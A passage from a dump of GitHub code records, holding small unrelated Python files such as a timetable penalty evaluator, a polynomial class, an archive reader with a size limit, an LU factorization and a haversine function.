\"\"\"Return sum of penalties for room capacity\"\"\"\n penalty = 0\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if room.capacity < course.studentsNum:\n #print day,period,room.id,course.id\n #print room.capacity, course.studentsNum\n penalty += course.studentsNum - room.capacity\n #print \"Room capacity: \",penalty\n return penalty\n\n def countMinimumWorkingDaysPenalty(self, timetable):\n \"\"\"Return sum of penalties for minimum working days\"\"\"\n penalty = 0\n\n for course in self.data.courses:\n days = set()\n for slot in timetable.courses[course.id]:\n day, _, _ = self.factory.unzip(slot)\n days.add(day)\n\n if len(days) < course.minWorkingDays:\n #print 
course.id\n penalty += (course.minWorkingDays - len(days)) * 5\n\n #print \"Min working days: \",penalty\n return penalty\n\n def countCurriculumCompactnessPenalty(self, timetable):\n \"\"\"Return sum of penalties for curriculum compactness\"\"\"\n penalty = 0\n for curriculum in self.data.curricula:\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if course.id in curriculum.members:\n ce = course\n before = False\n if period == 0:\n before = False\n else:\n for room in self.data.rooms:\n course = timetable.periods[day][period-1][room.id]\n if course != None:\n if course.id in curriculum.members:\n before = True\n\n after = False\n if period == len(timetable.periods[day]) -1:\n after = False\n else:\n for room in self.data.rooms:\n course = timetable.periods[day][period+1][room.id]\n if course != None:\n if course.id in curriculum.members:\n after = True\n if not before and not after:\n #print day, period, curriculum.id, ce.id\n penalty += 2\n\n\n #for curriculum in self.data.curricula:\n #for day in timetable.periods:\n #print \"Day\"\n #penaltyDay =0\n #prev = False\n #alone = False\n #per = 0\n #for period in day:\n #print \"Day\"\n #for room in period:\n #course = period[room]\n #if course != None:\n #if course.id in curriculum.members:\n #if prev == False or per -1 != prev:\n #penaltyDay += 2\n #alone = True\n #print course.id\n #else:\n #if alone:\n #print \"Del \", course.id\n #penaltyDay -= 2\n #alone = False\n #prev = per\n #per += 1\n #if penaltyDay > 0:\n #penalty += penaltyDay\n\n\n #print \"Curiculum compactness: \",penalty\n return penalty\n\n def countRoomStabilityPenalty(self, timetable):\n \"\"\"Return sum of penalties for room stability\"\"\"\n penalty = 0\n\n for course in self.data.courses:\n rooms = set()\n for slot in timetable.courses[course.id]:\n _, _, room = self.factory.unzip(slot)\n rooms.add(room.id)\n\n if len(rooms) > 1:\n #print course.id\n #print len(rooms)\n penalty += len(rooms) - 1\n\n #print \"Room stability: \",penalty\n return penalty\n\n def countLectureConflictsPenalty(self, timetable):\n \"\"\"Return sum of penalties for lecture conflicts\"\"\"\n penalty = 0\n\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n courses = dict()\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n courses[course.id] = courses.get(course.id, 0) + 1\n for c in courses:\n if courses[c] > 1:\n #print c\n penalty += courses[c] - 1\n #print \"Lecture Conflicts: \", penalty\n return 1000000 * penalty\n\n def countConflictsPenalty(self, timetable):\n \"\"\"Return sum of penalties for conflicts\"\"\"\n penalty = 0\n\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n teachers = dict()\n courses = set()\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if not course.id in courses:\n teachers[course.teacher] = teachers.get(course.teacher, 0) + 1\n #if teachers[course.teacher] > 1:\n #print day, period\n courses.add(course.id)\n\n\n for t in teachers:\n if teachers[t] > 1:\n #print t\n penalty += (teachers[t] * (teachers[t] -1)) / 2\n\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n for curriculum in self.data.curricula:\n count = 0\n courses = set()\n for room in self.data.rooms:\n 
course = timetable.periods[day][period][room.id]\n if course != None:\n if course.id in curriculum.members:\n count += 1\n courses.add(course.id)\n if len(courses) > 1:\n #print day, period\n #print courses\n count = len(courses)\n #print (count * (count -1)) / 2\n penalty += (count * (count -1)) / 2\n #print penalty\n #print \"Conflicts: \", penalty\n return penalty * 1000000\n\n def countAvailabilitesPenalty(self, timetable):\n \"\"\"return sum of penalties for availabilities\"\"\"\n penalty = 0\n\n #print \"Avail\"\n\n for constraint in self.data.constraints:\n day = constraint.day\n period = constraint.dayPeriod\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if course.id == constraint.id:\n #print course.id, day, period\n penalty +=1\n\n #print \"Avail: \", penalty\n return penalty * 1000000\n\n\n","repo_name":"tomecki/cats","sub_path":"cats/pso/evaluationFunction.py","file_name":"evaluationFunction.py","file_ext":"py","file_size_in_byte":8911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10640109671","text":"ROLE_HR = 211\nROLE_EMPLOYEE = 337\nROLE_HOD = 319\nROLE_SUPERUSER = 402\nROLE_ACCOUNTS = 404\nROLE_APPROVAL = 425\nROLE_DUE_HEAD = 426\nROLE_HR_REPORTS = 1345\nROLE_WEB_COORDINATOR = 1346\nROLE_ACHIVEMENT = 1348\nROLE_STUDENT_ACCOUNTS = 1353\nROLE_RND = 1357\nROLE_REGISTRAR = 1358\nROLE_APPRAISAL = 1362\nROLE_REGISTRAR_REPORT = 1368\nROLE_ACADEMIC = 1369\nROLE_DEAN = 1371\nROLE_STUDENT_REPORT = 1372\nROLE_DIRECTOR = 1373\nROLE_REDRESSAL_ADMIN = 1384\nROLE_ADMIN_OFFICER = 1412\nROLE_CHIEF_RECTOR_GIRLS = 1414\nROLE_RECTOR = 1414\nROLE_CHIEF_RECTOR_BOYS = 1413\nROLE_NOTICE_HEAD = 1526\nROLE_LIBRARY_REPORT = 1498\nROLE_ADMIN_APPRAISAL = 1364\nROLE_NOTIFICATION = 1528\nROLE_MARKS_ANALYSIS_CORDINATOR = 1545\n","repo_name":"samyak3009/erp_backend","sub_path":"erp/constants_variables/rolesCheck.py","file_name":"rolesCheck.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29053186642","text":"f = open('./input.txt','r')\ns = f.readlines()\nf.close()\nto_sum = []\n\nfor line in s:\n linearray = line.split()\n linearray = list(map(int, linearray))\n linearray = sorted(linearray,reverse=True)\n i = 1\n lgth = len(linearray)\n for l in linearray:\n to_div = linearray[i:lgth]\n print(linearray)\n print(to_div)\n for d in to_div:\n if l % d == 0:\n to_sum.append(l // d)\n\n i = i + 1 \n\n\nprint(to_sum) \ntotal = 0\nfor num in to_sum:\n total = total + num\n\nprint(total) ","repo_name":"mdanidl/aoc","sub_path":"2017/day-2/script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38029595517","text":"#!/usr/bin/env python3\n\nimport tempfile\nimport shutil\nimport subprocess\nimport json\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nREPO = \"https://github.com/hgn/captcp.git\"\n\n\ndef clone(tmpdir):\n cmd = \"git clone {} {}\".format(REPO, tmpdir)\n w = subprocess.Popen(cmd.split())\n w.wait()\n\ndef tags(tmpdir):\n cmd = 'git -C {} tag'.format(tmpdir)\n result = subprocess.run(cmd.split(), stdout=subprocess.PIPE)\n tags = result.stdout.decode('utf-8').splitlines()\n return sorted(tags)\n\ndef checkout(tmpdir, tag):\n cmd = \"git -C {} checkout {}\".format(tmpdir, tag)\n w = subprocess.Popen(cmd.split())\n w.wait()\n\ndef 
cloc(tmpdir):\n cmd = 'cloc --json {}'.format(tmpdir)\n result = subprocess.run(cmd.split(), stdout=subprocess.PIPE)\n cloc = result.stdout.decode('utf-8')\n return json.loads(cloc)\n\ndef graph(tags, data):\n dpi = 300\n #plt.figure(figsize=(20,10))\n #plt.figure(num=None, figsize=(80, 60), dpi=200, facecolor='w', edgecolor='k')\n matplotlib.rcParams.update({'font.size': 4})\n plt.figure(figsize=(1200 / dpi, 800 / dpi), dpi=dpi, facecolor='w', edgecolor='k', frameon=False)\n x = list(); y = list(); labels = list()\n for i, tag in enumerate(tags):\n x.append(i)\n y.append(data[tag]['SUM']['code'])\n labels.append(tag)\n plt.plot(x, y)\n plt.xticks(x, labels, rotation='vertical')\n # Pad margins so that markers don't get clipped by the axes\n # Tweak spacing to prevent clipping of tick-labels\n plt.margins(.2)\n plt.subplots_adjust(bottom=0.15)\n plt.ylabel('Lines of Code')\n plt.xlabel('Release')\n plt.savefig('cloc.png', dpi=dpi)\n\n\n\nif __name__ == \"__main__\":\n tmp_dir = \"/tmp/foo\"\n shutil.rmtree(tmp_dir, ignore_errors=True)\n #tmp_dir = tempfile.TemporaryDirectory(delete=False)\n print(tmp_dir)\n clone(tmp_dir)\n tags = tags(tmp_dir)\n data = dict()\n for tag in tags:\n print(tag)\n checkout(tmp_dir, tag)\n data[tag] = cloc(tmp_dir)\n graph(tags, data)\n","repo_name":"hgn/loc-grapher","sub_path":"loc-grapher.py","file_name":"loc-grapher.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45583293063","text":"import math\n\ndef check(n):\n for i in range (2, int(math.sqrt(n))+1):\n if n % i == 0:\n return False\n return n > 1\n\nfor t in range(int(input())):\n a = int(input())\n k = 0\n for i in range(1, a):\n if math.gcd(i, a) == 1:\n k = k+1\n\n if check(k):\n print(\"YES\")\n else:\n print(\"NO\")\n","repo_name":"ThaiMinhNguyen/Python_PTIT","sub_path":"PY01004.py","file_name":"PY01004.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7780580664","text":"# This module implements the vector of homogenous bivariate polynomial \n# The coefficients can be derived from any scalar class\n\nfrom simple_vectors import Vector\nfrom utils import matrix_rank\n\nclass PolyUnivar(Vector):\n def __init__(self, arr):\n # Initialize the polynomial with coefficients\n if (len(arr) == 0):\n self.coeffs = []\n self.deg = 0\n elif (arr[0] == arr[0].zero()):\n raise Exception(\"The first coefficient of a polynomial cannot be zero\")\n else:\n self.coeffs = arr\n self.deg = len(arr)\n\n def __repr__(self):\n return \"(\" + repr(self.coeffs) + \", \" + repr(self.deg) + \")\"\n\n def __add__(self, other):\n # If the degree of the other is more, swap the two variables\n if (self.deg < other.deg):\n self, other = other, self\n\n offset = self.deg - other.deg\n\n if (self.deg == 0):\n return PolyUnivar([])\n \n # Copy the first self.deg - other.deg coeffs\n result = [self.coeffs[i] for i in range(offset)]\n \n # Add the remaining values\n for i in range(other.deg):\n result.append(other.coeffs[i] + self.coeffs[i + offset])\n\n # Remove leading zeros \n zeroElement = self.coeffs[0].zero()\n ctr = 0\n maxctr = len(result)\n while(ctr < maxctr):\n if (result[ctr] == zeroElement):\n ctr += 1\n else:\n break \n result = result[ctr:]\n\n return PolyUnivar(result)\n\n def __mul__(self, other):\n if (self.deg < other.deg):\n self, other = other, self \n\n if (other.deg == 0):\n if (self.deg == 0):\n return 
0\n else:\n return self.coeffs[0].zero()\n\n result = self.coeffs[0].zero()\n offset = self.deg - other.deg\n \n for i in range(other.deg):\n result = result + self.coeffs[i + offset] * other.coeffs[i]\n \n return result \n\n def __rmul__(self, other):\n if (other == other.zero()):\n return PolyUnivar([])\n\n result = []\n\n for i in range(self.deg):\n result.append(other * self.coeffs[i])\n \n return PolyUnivar(result)\n\n def __eq__(self, other):\n return self.coeffs == other.coeffs \n\n def zero(self):\n return PolyUnivar([])\n\n def linearlyIndependent(self, arr):\n m = len(arr)\n\n # The empty set is linearly independent\n if (m == 0):\n return True\n\n # Find the maximal degree and a zero element \n maxDegree = 0\n zeroElement = None\n\n for p in arr:\n maxDegree = max(maxDegree, p.deg)\n if (p.deg > 0 and zeroElement == None):\n zeroElement = p.coeffs[0].zero()\n \n if maxDegree == 0:\n return False\n\n M = [[zeroElement for i in range(maxDegree)] for j in range(m)]\n\n for i in range(m):\n offset = maxDegree - arr[i].deg \n for j in range(offset):\n M[i][j] = zeroElement\n \n for j in range(arr[i].deg):\n M[i][j + offset] = arr[i].coeffs[j]\n\n return matrix_rank(M) == m\n\n # This is polynomial multiplication (not strictly a vector operation)\n def __pow__(self, other):\n if not isinstance(other, PolyUnivar):\n return NotImplemented\n else:\n if (self.deg == 0 or other.deg == 0):\n return PolyUnivar([])\n \n zeroElement = self.coeffs[0].zero()\n res_deg = self.deg + other.deg \n res_coeffs = []\n\n for deg in range(res_deg):\n coeff_value = zeroElement\n for i in range(deg + 1):\n if (i < self.deg and deg - i < other.deg):\n coeff_value += self.coeffs[self.deg - i - 1] * other.coeffs[other.deg - deg + i - 1]\n res_coeffs.append(coeff_value)\n \n res_coeffs.reverse()\n\n # Remove leading zeros \n ctr = 0\n ctr_max = len(res_coeffs)\n\n while(ctr < ctr_max):\n if res_coeffs[ctr] == zeroElement:\n ctr+=1\n else:\n break \n\n res_coeffs = res_coeffs[ctr:]\n \n return PolyUnivar(res_coeffs)\n\n\n","repo_name":"anag004/vspy","sub_path":"poly_univar.py","file_name":"poly_univar.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10208157615","text":"import os\nimport zipfile\nimport tarfile\ntry:\n import magic\nexcept ImportError:\n magic = None\nimport io\nimport re\nfrom collections.abc import Iterator, Callable\nfrom typeatlas.util import generic_type\n\nSequenceOf = generic_type('Sequence')\nOptional = generic_type('Optional')\n\n\nextension_factories = {}\nmimetype_factories = {}\n\n\ndef get_factory(filename: str=None, fileobj: io.BufferedIOBase=None, *,\n mimetype: str=None) -> type:\n\n \"\"\"Return the archive factory for the given archive type.\"\"\"\n\n if filename is None and (fileobj is None or mimetype is None):\n raise TypeError(\"filename or fileobject with mime required\")\n\n if mimetype is None and filename is not None and magic is not None:\n if fileobj is None or os.access(filename, os.R_OK):\n mimetype = magic.from_file(filename, mime=True)\n\n if mimetype is not None:\n for factory in mimetype_factories.get(mimetype, ()):\n if (fileobj is not None or filename is None or\n factory.is_known_archive(filename)):\n return factory\n\n if filename:\n match = re.search(r'\\.([^\\.]+(?:\\.([^\\.]+))?)$', filename)\n if match is not None:\n for ext in match.groups():\n if ext:\n for factory in extension_factories.get(ext, ()):\n return factory\n\n raise 
UnknownArchiveFormat(\"%r [%s] has unknown archive format\"\n                               % (filename or fileobj, mimetype))\n\n\ndef is_known_archive(filename: str, *, mimetype: str=None) -> bool:\n    \"\"\"Return true if the file is a known archive.\"\"\"\n    if mimetype is None and magic is not None:\n        mimetype = magic.from_file(filename, mime=True)\n\n    for factory in mimetype_factories.get(mimetype, ()):\n        if factory.is_known_archive(filename):\n            return True\n\n    if filename:\n        for ext in re.search(r'\\.([^\\.]+(?:\\.([^\\.]+))?)$', filename).groups():\n            if ext:\n                for factory in extension_factories.get(ext, ()):\n                    if factory.is_known_archive(filename):\n                        return True\n\n    return False\n\n\ndef get_archive(filename: str=None, fileobj: io.BufferedIOBase=None, *,\n                mimetype: str=None) -> 'Archive':\n\n    \"\"\"Return the archive object that can iterate over the files\n    archived inside the file.\"\"\"\n\n    factory = get_factory(filename, fileobj, mimetype=mimetype)\n    return factory(filename, fileobj)\n\n\ndef archive_iterate(filename: str=None, fileobj: io.BufferedIOBase=None, *,\n                    mimetype: str=None) -> Iterator:\n    \"\"\"Iterate over the provided archive filename or object.\"\"\"\n    return get_archive(filename, fileobj, mimetype=mimetype).iterate()\n\n\ndef register(extensions: SequenceOf[str]=(), mimetypes: SequenceOf[str]=(),\n             compressions: SequenceOf[str]=()) -> Callable:\n    \"\"\"Return a decorator registering the given archive type for the\n    given extensions and mime types.\"\"\"\n\n    def decorator(cls):\n        for ext in extensions:\n            extension_factories.setdefault(ext, []).append(cls)\n        for mime in mimetypes:\n            mimetype_factories.setdefault(mime, []).append(cls)\n        for mime in compressions:\n            mimetype_factories.setdefault(mime, []).append(cls)\n\n        cls.extensions = tuple(extensions)\n        cls.mimetypes = tuple(mimetypes)\n        cls.compressions = tuple(compressions)\n\n        # return the class, otherwise the decorated class is replaced by None\n        return cls\n\n    return decorator\n\n\nclass Archive:\n\n    extensions = ()\n    mimetypes = ()\n    compressions = ()\n\n    def __init__(self, filename: str=None, fileobj: io.BufferedIOBase=None):\n        self.filename = filename\n        self.fileobj = fileobj\n\n    @classmethod\n    def is_known_archive(self, filename: str) -> bool:\n        \"\"\"Return True if we can read this file with this class.\"\"\"\n        if magic is not None:\n            return magic.from_file(filename, mime=True) in self.mimetypes\n\n        for ext in re.search(r'\\.([^\\.]+(?:\\.([^\\.]+))?)$',\n                             filename).groups():\n            if ext:\n                if ext in self.extensions:\n                    return True\n\n        return False\n\n    def iterate(self) -> Iterator:\n        raise NotImplementedError\n\n    def __iter__(self):\n        return self.iterate()\n\n    def __repr__(self):\n        return \"%s(%r, %r)\" % (type(self).__name__,\n                               self.filename, self.fileobj)\n\n\nclass ArchiveMember:\n\n    @property\n    def name(self) -> str:\n        \"\"\"The name or path of the member.\"\"\"\n        raise NotImplementedError\n\n    @property\n    def size(self) -> Optional[int]:\n        \"\"\"The size in bytes of the member.\"\"\"\n        raise NotImplementedError\n\n    def open(self) -> io.BytesIO:\n        \"\"\"Return a bytes file object for reading the archive member.\"\"\"\n        raise NotImplementedError\n\n    def getdata(self, limit: Optional[int]=16777216) -> bytes:\n        \"\"\"Return the data as a bytes object. 
There is a default zip bomb\n limit in place.\"\"\"\n if limit is None:\n return self.open().read()\n\n if self.size is not None:\n if self.size > limit:\n raise MemberTooBigError(\"%r is larger than zip bomb \"\n \"limit of %d\" % (self, limit))\n\n fileob = self.open()\n result = fileob.read(limit)\n if len(result) >= limit:\n if len(result) > limit or fileob.read(1):\n raise MemberTooBigError(\"%r is larger than zip bomb \"\n \"limit of %d\" % (self, limit))\n\n return result\n\n def isdir(self) -> bool:\n \"\"\"Return True if this is a directory.\"\"\"\n raise NotImplementedError\n\n def isfile(self) -> bool:\n \"\"\"Return True if this is a regular file.\"\"\"\n return not self.isdir()\n\n def isfifo(self) -> bool:\n \"\"\"Return True if this is a named FIFO.\"\"\"\n return False\n\n def isblk(self) -> bool:\n \"\"\"Return True if this is a block device.\"\"\"\n return False\n\n def ischr(self) -> bool:\n \"\"\"Return True if this is a character device.\"\"\"\n return False\n\n def islink(self) -> bool:\n \"\"\"Return True if this is a symlink.\"\"\"\n return False\n\n def issocket(self) -> bool:\n \"\"\"Return True if this is a socket.\"\"\"\n return False\n\n def ishardlink(self) -> bool:\n \"\"\"Return True if this is a hard link.\"\"\"\n return False\n\n def __repr__(self):\n typename = 'unknown'\n try:\n if self.isfile():\n typename = 'file'\n elif self.isdir():\n typename = 'dir'\n elif self.islink():\n typename = 'symlink'\n elif self.ishardlink():\n typename = 'hardlink'\n elif self.isfifo():\n typename = 'FIFO'\n elif self.isblk():\n typename = 'blockdev'\n elif self.ischr():\n typename = 'chardev'\n elif self.issocket():\n typename = 'socket'\n except Exception:\n typename = 'broken'\n\n size = self.size\n if size is None:\n size = '-'\n\n return '<%s %r (%s) [%s] at 0x%x>' % (type(self).__name__, self.name,\n typename, size, id(self))\n\n\nclass ZipMember(ArchiveMember):\n\n def __init__(self, archive: zipfile.ZipFile, member: zipfile.ZipInfo):\n self.archive = archive\n self.member = member\n\n @property\n def name(self) -> str:\n return self.member.filename\n\n @property\n def size(self) -> Optional[int]:\n return self.member.file_size\n\n def isdir(self) -> bool:\n return self.member.is_dir()\n\n def open(self) -> io.BytesIO:\n return self.archive.open(self.member)\n\n\nclass TarMember(ArchiveMember):\n\n def __init__(self, archive: tarfile.TarFile, member: tarfile.TarInfo):\n self.archive = archive\n self.member = member\n\n @property\n def name(self) -> str:\n return self.member.name\n\n @property\n def size(self) -> Optional[int]:\n return self.member.size\n\n def isdir(self) -> bool:\n return self.member.isdir()\n\n def isfile(self) -> bool:\n return self.member.isfile()\n\n def isfifo(self) -> bool:\n return self.member.isfifo()\n\n def isblk(self) -> bool:\n return self.member.isblk()\n\n def ischr(self) -> bool:\n return self.member.ischr()\n\n def islink(self) -> bool:\n return self.member.issym()\n\n def ishardlink(self) -> bool:\n return self.member.islnk()\n\n def open(self) -> io.BytesIO:\n return self.archive.extractfile(self.member)\n\n\n@register(['zip'], ['application/zip'])\nclass ZipArchive(Archive):\n\n def iterate(self) -> Iterator:\n if self.fileobj is None:\n srcfile = self.filename\n else:\n srcfile = self.fileobj\n\n with zipfile.ZipFile(srcfile, 'r') as archive:\n for member in archive.infolist():\n yield ZipMember(archive, member)\n\n\n@register(['tar', 'tar.gz', 'tar.bz2', 'tar.xz', 'tar.lzma'],\n ['application/x-tar'],\n ['application/gzip', 
'application/x-gzip',\n           'application/x-bzip2', 'application/x-xz',\n           'application/x-lzma'])\nclass TarArchive(Archive):\n\n    @classmethod\n    def is_known_archive(self, filename: str) -> bool:\n        return tarfile.is_tarfile(filename)\n\n    def iterate(self) -> Iterator:\n        if self.fileobj is None:\n            mode = 'r:*'\n        else:\n            mode = 'r|*'\n\n        with tarfile.open(self.filename, mode, self.fileobj) as archive:\n            for member in archive:\n                yield TarMember(archive, member)\n\n\nclass ArchiveError(OSError):\n    \"\"\"Base exception for archive errors.\"\"\"\n\n\nclass UnknownArchiveFormat(ArchiveError):\n    \"\"\"Raised when the archive format is unknown.\"\"\"\n\n\nclass MemberTooBigError(ArchiveError):\n    \"\"\"Raised when zip bomb limit was exceeded.\"\"\"\n\n\nif __name__ == '__main__':\n    import traceback, sys, hashlib\n    for arg in sys.argv[1:]:\n        try:\n            for member in archive_iterate(arg):#, open(arg, 'rb'),\n                                           #mimetype=magic.from_file(arg, mime=True)):\n                print(member)\n                if member.isfile():\n                    print('    ', hashlib.md5(member.open().read()).hexdigest())\n                    #print('    ', hashlib.md5(member.open().read()).hexdigest())\n                    #f = member.open()\n                    #print('    ', hashlib.md5(f.read()).hexdigest())\n                    #f.seek(0)\n                    #print('    ', hashlib.md5(f.read()).hexdigest())\n        except Exception:\n            traceback.print_exc()\n","repo_name":"milkokr/typeatlas","sub_path":"typeatlas/archiving.py","file_name":"archiving.py","file_ext":"py","file_size_in_byte":10774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38576058261","text":"import os\nimport re\nfrom typing import List\n\nfrom icrawler.builtin import GoogleImageCrawler\n\nfrom consts.path_consts import GOOGLE_IMAGES_RESOURCES_PATH\n\n\nclass GoogleImagesDownloader:\n    def __init__(self, images_per_artist: int):\n        self._images_per_artist = images_per_artist\n        self._invalid_os_chars_regex = re.compile(r'[/:\\\"]')\n        self._images_paths = None\n        self._remove_images(images_paths=self._get_image_paths())\n\n    def download(self, artist: str) -> List[str]:\n        try:\n            return self._download(artist)\n\n        except Exception:\n            print('Received exception! 
returning empty list')\n            return []\n\n    def _download(self, artist: str) -> List[str]:\n        crawler = GoogleImageCrawler(storage={'root_dir': GOOGLE_IMAGES_RESOURCES_PATH})\n        crawler.crawl(keyword=f'{artist} musician', max_num=self._images_per_artist)\n        self._images_paths = self._get_image_paths()\n\n        return self._images_paths\n\n    @staticmethod\n    def _get_image_paths() -> List[str]:\n        images_paths = []\n\n        for file in os.listdir(GOOGLE_IMAGES_RESOURCES_PATH):\n            file_path = os.path.join(GOOGLE_IMAGES_RESOURCES_PATH, file)\n\n            if os.path.isfile(file_path):\n                images_paths.append(file_path)\n\n        return images_paths\n\n    def _remove_images(self, images_paths: List[str], retries_left: int = 3) -> None:\n        if retries_left == 0:\n            raise PermissionError()\n\n        # iterate over a copy: removing from the list being iterated would skip files\n        for image_path in list(images_paths):\n            try:\n                os.remove(image_path)\n                images_paths.remove(image_path)\n\n            except PermissionError:\n                return self._remove_images(images_paths, retries_left=retries_left-1)\n\n    def __enter__(self):\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        if self._images_paths is None:\n            return\n\n        self._remove_images(self._images_paths)\n        self._images_paths = None\n","repo_name":"nirgodin/RadioStations","sub_path":"data_collection/google_images/google_images_downloader.py","file_name":"google_images_downloader.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"1528025196","text":"from copy import deepcopy\n\n\ndef LUFactorization(iA):\n    A = deepcopy(iA)\n    n = len(A)\n    L = [[0 for i in range(n)] for j in range(n)]\n    U = [[0 for i in range(n)] for j in range(n)]\n\n    for k in range(0, n-1):\n        if A[k][k] == 0:\n            return None\n        for i in range(k+1, n):\n            A[i][k] = A[i][k]/A[k][k]\n            for j in range(k+1, n):\n                A[i][j] = A[i][j]-A[i][k]*A[k][j]\n\n    for i in range(0, n):\n        L[i][i] = 1\n        for j in range(0, i):\n            L[i][j] = A[i][j]\n        for j in range(i, n):\n            U[i][j] = A[i][j]\n    return L, U\n\n\ndef assess(A):\n    res = LUFactorization(A)\n    if res:\n        return f\"L={res[0]}\\nU={res[1]}\"\n    return \"No unique LU factorization\"\n\n\nA1 = [\n    [1, 2, 2],\n    [4, 4, 2],\n    [4, 6, 4]\n]\n\n\nA2 = [\n    [1, 2, 2],\n    [1, 2, 2],\n    [4, 6, 4]\n]\n\n\nprint(\"For A1:\", assess(A1))\nprint(\"For A2:\", assess(A2))\n","repo_name":"BI1LQV/num-analysis","sub_path":"hw2/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14476856837","text":"import re\r\nimport optparse\r\n\r\nfrom django.core.management.base import BaseCommand\r\n\r\nfrom dbmail.models import MailTemplate\r\nfrom dbmail.defaults import BACKEND\r\nfrom dbmail import db_sender\r\n\r\n\r\ndef send_test_msg(pk, email, user=None, **kwargs):\r\n    template = MailTemplate.objects.get(pk=pk)\r\n    slug = template.slug\r\n    var_list = re.findall('\\\\{\\\\{\\\\s?(\\\\w+)\\\\s?\\\\}\\\\}', template.message)\r\n    context = {}\r\n    for var in var_list:\r\n        context[var] = '%s' % var.upper().replace('_', '-')\r\n    return db_sender(slug, email, user, context, **kwargs)\r\n\r\n\r\nclass Command(BaseCommand):\r\n    def add_arguments(self, parser):\r\n        parser.add_argument('--email', default='localhost', help='Recipients')\r\n        parser.add_argument('--pk', default=1, help='DBMail template id')\r\n        parser.add_argument('--without-celery',\r\n                            action='store_true',\r\n                            default=False, dest='celery',\r\n                            help='Send direct message')\r\n        parser.add_argument('--provider', help='Provider')\r\n        parser.add_argument('--backend', help='Backend')\r\n\r\n    @staticmethod\r\n    def get_kwargs(options):\r\n        kwargs = 
{\n 'use_celery': not options['celery'],\n 'backend': BACKEND['mail']}\n if options['provider']:\n kwargs['provider'] = options['provider']\n if options['backend']:\n kwargs['backend'] = BACKEND[options['backend']]\n return kwargs\n\n def handle(self, *args, **options):\n send_test_msg(\n options['pk'], options['email'], **self.get_kwargs(options)\n )\n print(\"Done. Message was sent.\")\n","repo_name":"LPgenerator/django-db-mailer","sub_path":"dbmail/management/commands/dbmail_test_send.py","file_name":"dbmail_test_send.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":254,"dataset":"github-code","pt":"19"} +{"seq_id":"73343593962","text":"from discord.ui import View\n\nfrom templates.button.buttons import buttons\n\n\nclass ChoseLikeGender(View):\n def __init__(self, user_like_woman, user_like_man):\n super().__init__(timeout=None)\n buttons.woman.callback = user_like_woman\n buttons.man.callback = user_like_man\n self.add_item(buttons.woman)\n self.add_item(buttons.man)\n","repo_name":"BladeXses21/Raffael-Discord-DatingBot","sub_path":"main/src/templates/views/like_gender_view_builder.py","file_name":"like_gender_view_builder.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"26609864951","text":"from sklearn.svm import SVC\n\nfrom data_preparation import load\nfrom training import select_model\n\nif __name__ == '__main__':\n digit1, digit2 = 8, 5\n dataset = load(digit1, digit2)\n parameters = {\n 'kernel': ['sigmoid', 'rbf', 'poly'],\n 'degree': [3, 4, 5],\n }\n select_model(dataset, SVC, parameters)\n","repo_name":"Pavlik1400/MLLL_project","sub_path":"src/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15278700111","text":"from math import radians, cos, sin, asin, sqrt\n\n\n__all__ = [\"haversine\"]\n\n\ndef haversine(\n lat1: float,\n lon1: float,\n lat2: float,\n lon2: float,\n) -> float:\n \"\"\"\n Example:\n lon1 = -103.548851\n lat1 = 32.0004311\n lon2 = -103.6041946\n lat2 = 33.374939\n\n haversine(lat1, lon1, lat2, lon2)\n 95.05067505558074\n \"\"\"\n # this is in miles\n # For Earth radius in kilometers use 6372.8 km\n R = 3959.87433\n\n dLat = radians(lat2 - lat1)\n dLon = radians(lon2 - lon1)\n lat1 = radians(lat1)\n lat2 = radians(lat2)\n\n a = (\n sin(dLat / 2) ** 2\n + cos(lat1) * cos(lat2) * sin(dLon / 2) ** 2\n )\n c = 2 * asin(sqrt(a))\n\n return R * c\n","repo_name":"kremrik/performant-python","sub_path":"performant_python/cython/haversine/haversine_python.py","file_name":"haversine_python.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71397048364","text":"from django.shortcuts import render\n\n# Create your views here.\n# views.py\nfrom rest_framework import viewsets\n\nfrom .serializers import HeroSerializer\nfrom .models import Hero\n\n\nfrom django.http import 